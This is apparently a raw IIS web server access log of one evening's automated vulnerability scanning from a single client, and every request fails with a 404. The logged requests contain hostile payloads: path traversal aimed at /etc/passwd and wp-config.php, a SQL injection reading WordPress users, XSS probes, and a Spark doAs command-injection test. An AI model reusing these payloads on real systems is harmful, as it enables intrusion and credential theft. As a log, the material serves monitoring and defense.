#Date: 2023-06-26 18:48:41
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 18:48:41 103.153.214.94 GET /index.php controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_communitypolls 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 27
2023-06-26 18:56:45 103.153.214.94 POST /xxl-job-admin/login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-26 18:56:45 103.153.214.94 POST /login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 21
2023-06-26 19:00:49 103.153.214.94 GET /api/v3/users - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 34
2023-06-26 19:02:01 103.153.214.94 GET / calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500&rest_route=/wc/store/products/collection-data 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 24
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 19:26:37
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 19:26:37 103.153.214.94 GET /lib/icinga/icinga-php-thirdparty/etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 30
2023-06-26 19:26:37 103.153.214.94 GET /icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 30
2023-06-26 19:26:37 103.153.214.94 GET /icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 27
2023-06-26 19:36:39 103.153.214.94 POST /fpui/loginServlet - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 26
2023-06-26 19:43:15 103.153.214.94 GET /index.php controller=../../../../../../../../etc/passwd%00&option=com_dwgraphs 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 28
2023-06-26 19:49:15 103.153.214.94 POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 28
2023-06-26 19:52:32 103.153.214.94 GET /doAs =`echo+CVE-2022-33891+%7C+rev` 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 27
2023-06-26 19:53:09 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_jinventory 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 27
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 20:09:55
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 20:09:55 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 26
2023-06-26 20:19:05 103.153.214.94 GET /components/com_rwcards/captcha/captcha_image.php img=../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 40
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 20:38:16
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 20:38:15 103.153.214.94 GET /application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 29
2023-06-26 20:38:15 103.153.214.94 GET /admin/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 24
2023-06-26 20:38:15 103.153.214.94 GET /application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 24
2023-06-26 20:38:15 103.153.214.94 GET /aplicacao/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26
2023-06-26 20:38:16 103.153.214.94 GET /cloudexp/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 23
2023-06-26 20:38:16 103.153.214.94 GET /cms/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 23
2023-06-26 20:38:16 103.153.214.94 GET /moto/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 24
2023-06-26 20:38:16 103.153.214.94 GET /Partners/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 23
2023-06-26 20:38:16 103.153.214.94 GET /radio/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 23
2023-06-26 20:38:16 103.153.214.94 GET /seminovos/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 24
2023-06-26 20:38:16 103.153.214.94 GET /shop/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 25
2023-06-26 20:38:16 103.153.214.94 GET /site_cg/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 26
2023-06-26 20:38:16 103.153.214.94 GET /slr/application/configs/application.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 23
2023-06-26 20:47:43 103.153.214.94 GET /index.php controller=../../../../../../../../../../../../etc/passwd%00&option=com_foobla_suggestions 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 36
2023-06-26 20:56:39 103.153.214.94 GET /wp-content/plugins/socialfit/popup.php msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&service=googleplus 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 28
2023-06-26 21:03:51 103.153.214.94 POST /geoserver/j_spring_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 26
2023-06-26 21:07:41 103.153.214.94 GET /webapi/v1/system/accountmanage/account - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 21:26:30
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 21:26:29 103.153.214.94 GET /wp-content/plugins/wpsite-background-takeover/exports/download.php filename=../../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 30
2023-06-26 21:32:05 103.153.214.94 POST /index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-06-26 21:32:06 103.153.214.94 POST /TransferredOutModal.php modfunc=detail 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 23
2023-06-26 21:35:27 103.153.214.94 GET /index.php Itemid=128&option=com_album&target=../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 30
2023-06-26 21:48:59 103.153.214.94 GET /XmlPeek.aspx dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 24
2023-06-26 22:03:09 103.153.214.94 GET /openam/ui/PWResetUserValidation - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 32
2023-06-26 22:03:09 103.153.214.94 GET /OpenAM-11.0.0/ui/PWResetUserValidation - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 25
2023-06-26 22:03:09 103.153.214.94 GET /ui/PWResetUserValidation - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-06-26 22:07:15 103.153.214.94 GET /index.php controller=../../../../../../../etc/passwd%00&option=com_jcollection 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 25
2023-06-26 22:11:04 103.153.214.94 GET /webui/file_guest flags=1152&path=/var/www/documentation/../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 29
2023-06-26 22:15:13 103.153.214.94 GET / layout=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 23
2023-06-26 22:16:41 103.153.214.94 POST /api/v1/method.callAnon/cve_exploit - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 30
2023-06-26 22:16:41 103.153.214.94 POST /api/v1/method.callAnon/cve_exploit - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 36
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 22:33:30
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 22:33:29 103.153.214.94 GET /set_safety.shtml r=52300 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 29
2023-06-26 22:35:13 103.153.214.94 POST /contactus.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 27
2023-06-26 22:41:41 103.153.214.94 GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 31
2023-06-26 22:44:01 103.153.214.94 GET /authenticationserverservlet - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-06-26 22:52:19 103.153.214.94 GET /miscadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 25
2023-06-26 22:52:19 103.153.214.94 GET /mcmadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-06-26 22:52:19 103.153.214.94 GET /miscadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 22
2023-06-26 22:52:19 103.153.214.94 GET /miscadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 23
2023-06-26 22:52:19 103.153.214.94 GET /miscadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 21
2023-06-26 22:52:19 103.153.214.94 GET /miscadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 23
2023-06-26 22:52:19 103.153.214.94 GET /miscadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 23
2023-06-26 22:52:19 103.153.214.94 GET /miscadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 21
2023-06-26 22:52:19 103.153.214.94 GET /miscadmin - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 21
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 23:12:19
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 23:12:19 103.153.214.94 GET /tiki-5.2/tiki-edit_wiki_section.php type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 26
2023-06-26 23:12:19 103.153.214.94 GET /tiki-edit_wiki_section.php type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 23
2023-06-26 23:12:27 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 24
2023-06-26 23:25:29 103.153.214.94 POST /index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27
2023-06-26 23:38:51 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 23:57:40
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 23:57:39 103.153.214.94 GET /maint/modules/endpointcfg/endpointcfg.php lang=../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 30